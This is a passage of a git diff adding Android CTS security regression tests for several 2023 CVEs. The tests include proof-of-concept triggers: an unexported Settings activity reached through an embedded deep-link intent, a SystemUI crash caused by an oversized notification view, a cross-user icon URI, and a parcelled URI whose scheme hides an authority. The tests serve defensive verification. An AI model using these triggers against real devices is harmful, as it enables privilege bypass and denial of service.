+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.content.Context;
+import android.content.pm.PackageInfo;
+import android.content.pm.PackageManager;
+import android.content.pm.PermissionInfo;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.ArrayList;
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_20927 extends StsExtraBusinessLogicTestCase {
+
+ @AsbSecurityTest(cveBugId = 244216503)
+ @Test
+ public void testPocCVE_2023_20927() {
+ try {
+ Context context = getApplicationContext();
+ PackageManager pm = context.getPackageManager();
+
+ // Skip test for non-automotive builds
+ assumeTrue(
+ "Skipping test: " + PackageManager.FEATURE_AUTOMOTIVE + " missing",
+ pm.hasSystemFeature(PackageManager.FEATURE_AUTOMOTIVE));
+
+ // Permissions added in com.android.car package as a part of the fix
+ List<String> missingPermissions = new ArrayList<String>();
+ missingPermissions.add("android.car.permission.BIND_PROJECTION_SERVICE");
+ missingPermissions.add("android.car.permission.BIND_VMS_CLIENT");
+ missingPermissions.add(
+ "android.car.permission.BIND_INSTRUMENT_CLUSTER_RENDERER_SERVICE");
+ missingPermissions.add("android.car.permission.BIND_CAR_INPUT_SERVICE");
+
+ // Fetch the permission of com.android.car package
+ final String pkgName = "com.android.car";
+ PackageInfo info = pm.getPackageInfo(pkgName, PackageManager.GET_PERMISSIONS);
+ assumeTrue(
+ "Package info for " + pkgName + " not fetched properly!! ",
+ info.packageName.equals(pkgName) && info.coreApp);
+ PermissionInfo[] permissionArray = info.permissions;
+ if (permissionArray != null) {
+ for (PermissionInfo perm : permissionArray) {
+ if (missingPermissions.contains(perm.name)) {
+ missingPermissions.remove(perm.name);
+ }
+ }
+ }
+
+ // Fail if any of the 4 permissions is missing
+ assertTrue(
+ "Vulnerable to b/244216503!"
+ + missingPermissions.toString()
+ + " missing in"
+ + " CarService.apk",
+ missingPermissions.size() == 0);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_20960.java b/tests/tests/security/src/android/security/cts/CVE_2023_20960.java
new file mode 100644
index 0000000..88d6e69
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_20960.java
@@ -0,0 +1,129 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+
+import android.app.Instrumentation;
+import android.app.UiAutomation;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.content.pm.ResolveInfo;
+import android.os.UserHandle;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.provider.Settings;
+import android.support.test.uiautomator.UiDevice;
+
+import androidx.test.platform.app.InstrumentationRegistry;
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_20960 extends StsExtraBusinessLogicTestCase {
+
+ @AsbSecurityTest(cveBugId = 250589026)
+ @Test
+ public void testPocCVE_2023_20960() {
+ UiAutomation uiAutomation = null;
+ UiDevice uiDevice = null;
+ try {
+ Instrumentation instrumentation = InstrumentationRegistry.getInstrumentation();
+ uiAutomation = instrumentation.getUiAutomation();
+ uiDevice = UiDevice.getInstance(instrumentation);
+ Context context = instrumentation.getContext();
+ final String installCaCertificateWarningActivity =
+ context.getString(R.string.cve_2023_20960_unexportedActivity);
+ String settingsPackageName =
+ context.getString(R.string.cve_2023_20960_settingsPackageName);
+
+ // Retrieve Settings app's package name
+ ResolveInfo info =
+ context.getPackageManager()
+ .resolveActivityAsUser(
+ new Intent(Settings.ACTION_SETTINGS),
+ PackageManager.MATCH_SYSTEM_ONLY,
+ UserHandle.USER_SYSTEM);
+ if (info != null && info.activityInfo != null) {
+ settingsPackageName = info.activityInfo.packageName;
+ }
+
+ // Attempt to launch unexported Activity using Settings app
+ uiAutomation.adoptShellPermissionIdentity(
+ android.Manifest.permission.LAUNCH_MULTI_PANE_SETTINGS_DEEP_LINK,
+ android.Manifest.permission.INTERACT_ACROSS_USERS);
+ context.startActivity(
+ new Intent(Settings.ACTION_SETTINGS_EMBED_DEEP_LINK_ACTIVITY)
+ .putExtra(
+ Settings.EXTRA_SETTINGS_EMBEDDED_DEEP_LINK_INTENT_URI,
+ context.getString(R.string.cve_2023_20960_uriStringIntent)
+ + context.getString(
+ R.string.cve_2023_20960_uriStringComponent)
+ + settingsPackageName
+ + context.getString(
+ R.string.cve_2023_20960_forwardSlash)
+ + installCaCertificateWarningActivity
+ + context.getString(
+ R.string.cve_2023_20960_uriStringSuffix))
+ .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+ // Check if unexported activity 'InstallCaCertificateWarning' is launched
+ String activityDump =
+ uiDevice.executeShellCommand(
+ context.getString(
+ R.string.cve_2023_20960_dumpsysActivityCmd,
+ settingsPackageName + installCaCertificateWarningActivity));
+
+ Pattern resumedTruePattern =
+ Pattern.compile(
+ context.getString(R.string.cve_2023_20960_mResumedTruePattern),
+ Pattern.CASE_INSENSITIVE);
+
+ // Wait for dumpsys result to update
+ int iteration = 0;
+ while (!resumedTruePattern.matcher(activityDump).find() && iteration <= 5) {
+ Thread.sleep(100);
+ activityDump =
+ uiDevice.executeShellCommand(
+ context.getString(
+ R.string.cve_2023_20960_dumpsysActivityCmd,
+ settingsPackageName + installCaCertificateWarningActivity));
+ iteration++;
+ }
+
+ assertFalse(
+ context.getString(R.string.cve_2023_20960_failMsg),
+ resumedTruePattern.matcher(activityDump).find());
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ uiAutomation.dropShellPermissionIdentity();
+ uiDevice.pressHome();
+ } catch (Exception e) {
+ // Ignore exceptions as the test has finished
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_21143.java b/tests/tests/security/src/android/security/cts/CVE_2023_21143.java
new file mode 100644
index 0000000..756782b
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_21143.java
@@ -0,0 +1,131 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.content.Context;
+import android.graphics.drawable.Icon;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.service.notification.StatusBarNotification;
+import android.widget.RemoteViews;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.compatibility.common.util.SystemUtil;
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_21143 extends StsExtraBusinessLogicTestCase {
+ private Instrumentation mInstrumentation = null;
+
+ @Test
+ @AsbSecurityTest(cveBugId = 268193777)
+ public void testPocCVE_2023_21143() {
+ Context context = null;
+ try {
+ mInstrumentation = getInstrumentation();
+ context = mInstrumentation.getContext();
+
+ // Getting pid of com.android.systemui
+ final String systemuiPidCommand = context.getString(R.string.systemuiPidCommand);
+ final int initialPidOfSystemUI = getPid(systemuiPidCommand);
+ assumeTrue(context.getString(R.string.noPidFound), initialPidOfSystemUI != -1);
+
+ // Adding a remoteview with large size image to notification in order to reproduce the
+ // vulnerability
+ final String packageName = context.getPackageName();
+ RemoteViews remoteView = new RemoteViews(packageName, R.layout.cve_2023_21143);
+ NotificationChannel channel =
+ new NotificationChannel(
+ context.getString(R.string.channelId),
+ context.getString(R.string.channelName),
+ NotificationManager.IMPORTANCE_HIGH);
+ NotificationManager notificationManager =
+ context.getSystemService(NotificationManager.class);
+ notificationManager.createNotificationChannel(channel);
+ Notification notification =
+ new Notification.Builder(context, context.getString(R.string.channelId))
+ .setContentText(context.getString(R.string.notificationText))
+ .setSmallIcon(Icon.createWithData(new byte[0], 0, 0))
+ .setCustomContentView(remoteView)
+ .build();
+ notificationManager.notify(1, notification);
+
+ // Assumption failure if notification has not been posted successfully.
+ assumeTrue(
+ context.getString(R.string.notificationSendingFailed),
+ poll(
+ () -> {
+ for (StatusBarNotification sbn :
+ notificationManager.getActiveNotifications()) {
+ if (sbn.getPackageName().equals(packageName)) {
+ return true;
+ }
+ }
+ return false;
+ }));
+
+ // Without fix, the systemui crashes and it's pid changes.
+ // Fail test only if pid has changed and notification is still visible.
+ boolean isDeviceVulnerable = false;
+ if (poll(() -> getPid(systemuiPidCommand) != initialPidOfSystemUI)) {
+ for (StatusBarNotification sbn : notificationManager.getActiveNotifications()) {
+ isDeviceVulnerable = sbn.getPackageName().equals(context.getPackageName());
+ if (isDeviceVulnerable) {
+ break;
+ }
+ }
+ }
+ assertFalse(context.getString(R.string.failMsg), isDeviceVulnerable);
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ // In case of without fix, a crash window stays.
+ SystemUtil.runShellCommand(
+ mInstrumentation, context.getString(R.string.shellCommandForHome));
+ } catch (Exception ignore) {
+ // ignore
+ }
+ }
+ }
+
+ private int getPid(String commandToFindPid) {
+ try {
+ // Getting pid of com.android.systemui
+ return Integer.parseInt(
+ SystemUtil.runShellCommand(mInstrumentation, commandToFindPid).trim());
+ } catch (Exception e) {
+ // ignore and return -1
+ return -1;
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_21246.java b/tests/tests/security/src/android/security/cts/CVE_2023_21246.java
new file mode 100644
index 0000000..fd87dbd
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_21246.java
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+
+import android.content.pm.ShortcutInfo;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_21246 extends StsExtraBusinessLogicTestCase {
+
+ @AsbSecurityTest(cveBugId = 273729476)
+ @Test
+ public void testPocCVE_2023_21246() {
+ try {
+ // Set shortcutIdLength = 10 * MAX_ID_LENGTH where value of MAX_ID_LENGTH is set to 1000
+ // in fix patch
+ final int shortcutIdLength = 10000;
+
+ // Create shortcutInfo object with shortcutId of length 10000
+ ShortcutInfo shortcutInfo =
+ new ShortcutInfo.Builder(
+ getApplicationContext(),
+ new String(new char[shortcutIdLength])
+ .replace("\0" /* oldChar */, "A" /* newChar */))
+ .build();
+
+ // Fail if shortcutId length is more than or equal to 10000
+ assertFalse(
+ "Device is vulnerable to b/273729476 since length of shortcutId is more than"
+ + " or equal to 10000 hence notification access can be persisted after"
+ + " reboot via a malformed notification listener with super large"
+ + " shortcutId enabled",
+ shortcutInfo.getId().length() >= shortcutIdLength);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_21283.java b/tests/tests/security/src/android/security/cts/CVE_2023_21283.java
new file mode 100644
index 0000000..dc3761d
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_21283.java
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static android.provider.MediaStore.Images.Media.EXTERNAL_CONTENT_URI;
+
+import static com.google.common.truth.Truth.assertWithMessage;
+import static com.google.common.truth.TruthJUnit.assume;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.content.ContentProvider;
+import android.content.Context;
+import android.graphics.drawable.Icon;
+import android.os.UserManager;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.telecom.StatusHints;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_21283 extends StsExtraBusinessLogicTestCase {
+
+ @AsbSecurityTest(cveBugId = 280797684)
+ @Test
+ public void testPocCVE_2023_21283() {
+ try {
+ // Check if the device supports multiple users or not
+ Context context = getContext();
+ assume().withMessage("This device does not support multiple users")
+ .that(context.getSystemService(UserManager.class).supportsMultipleUsers())
+ .isTrue();
+
+ // Create StatusHints object with an icon specified by URI associated with target user.
+ int targetUserId = context.getUserId() + 1;
+ StatusHints hints =
+ new StatusHints(
+ "CVE_2023_21283_user",
+ Icon.createWithContentUri(
+ ContentProvider.maybeAddUserId(
+ EXTERNAL_CONTENT_URI, targetUserId)),
+ null);
+
+ // With fix, getIcon() returns null.
+ assertWithMessage("Vulnerable to b/280797684").that(hints.getIcon()).isNull();
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_40119.java b/tests/tests/security/src/android/security/cts/CVE_2023_40119.java
new file mode 100644
index 0000000..96a7f29
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_40119.java
@@ -0,0 +1,67 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assert.assertEquals;
+import static org.junit.Assume.assumeNoException;
+
+import android.net.Uri;
+import android.os.Parcel;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_40119 extends StsExtraBusinessLogicTestCase {
+
+ @AsbSecurityTest(cveBugId = 231476072)
+ @Test
+ public void testPocCVE_2023_40119() {
+ try {
+ Parcel parcel = Parcel.obtain();
+
+ // Create an evil URI passing a scheme (that hides an unsafe authority and the ssp both)
+ // , a fake ssp and a fragment to Uri.fromParts() and write the evil URI to a parcel.
+ Uri.fromParts(
+ "scheme://notAllowedAuthorityAndSsp" /* scheme */,
+ "allowedAuthorityAndSsp" /* scheme-specific-part */,
+ "fragment" /* fragment */)
+ .writeToParcel(parcel, 0 /* No additional flags or options */);
+ parcel.setDataPosition(0);
+
+ Uri uriFromParcel = Uri.CREATOR.createFromParcel(parcel);
+
+ // Without fix, the scheme from parsing the string representation of uriFromParcel will
+ // return "scheme" as Uri parser checks for the delimiter ':' but the scheme from
+ // uriFromParcel.getScheme() will return "scheme://notAllowedAuthorityAndSsp" which
+ // hides the "not allowed" authority ("notAllowedAuthorityAndSsp") in the scheme
+ // enabling bypass of authority checks.
+ assertEquals(
+ "Vulnerable to b/231476072 !!, URIs are not canonicalized across AIDL"
+ + " boundaries",
+ Uri.parse(uriFromParcel.toString()).getScheme(),
+ uriFromParcel.getScheme());
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
index 92f3706..f9ce8df 100644
--- a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
+++ b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
@@ -34,6 +34,7 @@
import java.util.HashSet;
import java.util.List;
import java.util.Set;
+import java.util.TreeSet;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
@@ -44,7 +45,7 @@
@RestrictedBuildTest
public void testPackageSignatures() throws Exception {
- Set<String> badPackages = new HashSet<String>();
+ Set<String> badPackages = new TreeSet<>();
Set<Signature> wellKnownSignatures = getWellKnownSignatures();
PackageManager packageManager = mContext.getPackageManager();
@@ -77,7 +78,7 @@
* .bin files when adding entries to this list.
*/
private Set<Signature> getWellKnownSignatures() throws NotFoundException, IOException {
- Set<Signature> wellKnownSignatures = new HashSet<Signature>();
+ Set<Signature> wellKnownSignatures = new HashSet<>();
wellKnownSignatures.add(getSignature(R.raw.sig_media));
wellKnownSignatures.add(getSignature(R.raw.sig_platform));
wellKnownSignatures.add(getSignature(R.raw.sig_shared));
@@ -107,6 +108,83 @@
// won't negatively affect tests to include their signatures here too.
wellKnownSignatures.add(getSignature(R.raw.sig_com_google_android_tzdata));
wellKnownSignatures.add(getSignature(R.raw.sig_com_google_android_tzdata2));
+ wellKnownSignatures.add(getSignature(R.raw.sig_android_telephony_cts_testkey));
+ wellKnownSignatures.add(getSignature(R.raw.sig_build_bazel_examples_apex_minimal));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cert));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_adbd));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_adservices));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_adservices_api));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_appsearch));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_art));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_bluetooth));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_btservices));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_car_framework));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_cellbroadcast));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_compos));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_connectivity_resources));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_extservices));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_geotz));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_core_permissions));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_power));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_sensors));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_thermal));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_usb));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_vibrator));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hardware_wifi));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_hotspot2_osulogin));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_i18n));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_ipsec));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_mediaprovider));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_neuralnetworks));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_os_statsd));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_permission));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_rkpd));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_runtime));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_safetycenter_resources));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_sdkext));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_uwb));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_uwb_resources));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_vibrator_drv2624));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_vibrator_sunfish));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_virt));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_vndk));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_wifi));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_wifi_dialog));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_android_wifi_resources));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_google_cf_apex));
+ wellKnownSignatures.add(getSignature(R.raw.sig_com_google_emulated_camera_provider_hal));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_appsearch_helper_cert_a));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_appsearch_helper_cert_b));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_appsearch_hosttest_helper_cert_a));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_appsearch_hosttest_helper_cert_b));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_blob_helper_cert));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_blob_helper_cert2));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_keyset_test_a));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_keyset_test_b));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_keyset_test_c));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_keyset_test_ec_a));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_net_app));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_testkey1));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_testkey2));
+ wellKnownSignatures.add(getSignature(R.raw.sig_cts_uicc_2021));
+ wellKnownSignatures.add(getSignature(R.raw.sig_ec_p256));
+ wellKnownSignatures.add(getSignature(R.raw.sig_ec_p256_2));
+ wellKnownSignatures.add(getSignature(R.raw.sig_ec_p256_3));
+ wellKnownSignatures.add(getSignature(R.raw.sig_ec_p256_4));
+ wellKnownSignatures.add(getSignature(R.raw.sig_ec_p256_5));
+ wellKnownSignatures.add(getSignature(R.raw.sig_keyset_A));
+ wellKnownSignatures.add(getSignature(R.raw.sig_keyset_B));
+ wellKnownSignatures.add(getSignature(R.raw.sig_rro_remounted_test_a));
+ wellKnownSignatures.add(getSignature(R.raw.sig_rsa_2048));
+ wellKnownSignatures.add(getSignature(R.raw.sig_sdk_sandbox));
+ wellKnownSignatures.add(getSignature(R.raw.sig_security_cts_test_cert));
+ wellKnownSignatures.add(getSignature(R.raw.sig_shell_as_test_app_key));
+ wellKnownSignatures.add(getSignature(R.raw.sig_test_cert_1));
+ wellKnownSignatures.add(getSignature(R.raw.sig_test_cert_2));
+ wellKnownSignatures.add(getSignature(R.raw.sig_test_cert_3));
+ wellKnownSignatures.add(getSignature(R.raw.sig_test_cert_4));
+ wellKnownSignatures.add(getSignature(R.raw.sig_testcert));
+ wellKnownSignatures.add(getSignature(R.raw.sig_unit_test));
return wellKnownSignatures;
}
diff --git a/tests/tests/security/src/android/security/cts/PersistableBundleTest.java b/tests/tests/security/src/android/security/cts/PersistableBundleTest.java
new file mode 100644
index 0000000..e7780e4
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/PersistableBundleTest.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assert.assertEquals;
+import static org.junit.Assert.assertFalse;
+
+import android.os.PersistableBundle;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.ext.junit.runners.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.io.ByteArrayInputStream;
+
+@RunWith(AndroidJUnit4.class)
+public class PersistableBundleTest extends StsExtraBusinessLogicTestCase {
+
+ @AsbSecurityTest(cveBugId = 247513680)
+ @Test
+ public void testReadFromStream_invalidType() throws Exception {
+ String input = "<bundle><string name=\"key\">value</string>"
+ + "<byte-array name=\"invalid\" num=\"2\">ffff</byte-array></bundle>";
+ ByteArrayInputStream inputStream = new ByteArrayInputStream(input.getBytes());
+
+ // Reading from the stream with invalid type should not throw an exception
+ PersistableBundle restoredBundle = PersistableBundle.readFromStream(inputStream);
+
+ // verify invalid type is ignored
+ assertFalse(restoredBundle.containsKey("invalid"));
+ // verify valid type exists
+ assertEquals("value", restoredBundle.getString("key"));
+ }
+}
diff --git a/tests/tests/selinux/selinuxEphemeral/AndroidManifest.xml b/tests/tests/selinux/selinuxEphemeral/AndroidManifest.xml
index 4c62187..9e2deeb 100644
--- a/tests/tests/selinux/selinuxEphemeral/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxEphemeral/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.selinuxephemeral.cts"
android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/selinux/selinuxTargetSdk25/AndroidManifest.xml b/tests/tests/selinux/selinuxTargetSdk25/AndroidManifest.xml
index efdc4bd..da08049 100644
--- a/tests/tests/selinux/selinuxTargetSdk25/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxTargetSdk25/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.selinuxtargetsdk25.cts"
android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/selinux/selinuxTargetSdk27/AndroidManifest.xml b/tests/tests/selinux/selinuxTargetSdk27/AndroidManifest.xml
index 8449ea9..b94757c 100644
--- a/tests/tests/selinux/selinuxTargetSdk27/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxTargetSdk27/AndroidManifest.xml
@@ -33,6 +33,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.selinuxtargetsdk27.cts"
android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/selinux/selinuxTargetSdk28/AndroidManifest.xml b/tests/tests/selinux/selinuxTargetSdk28/AndroidManifest.xml
index b6b1baa..97d15c5 100644
--- a/tests/tests/selinux/selinuxTargetSdk28/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxTargetSdk28/AndroidManifest.xml
@@ -33,6 +33,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.selinuxtargetsdk28.cts"
android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
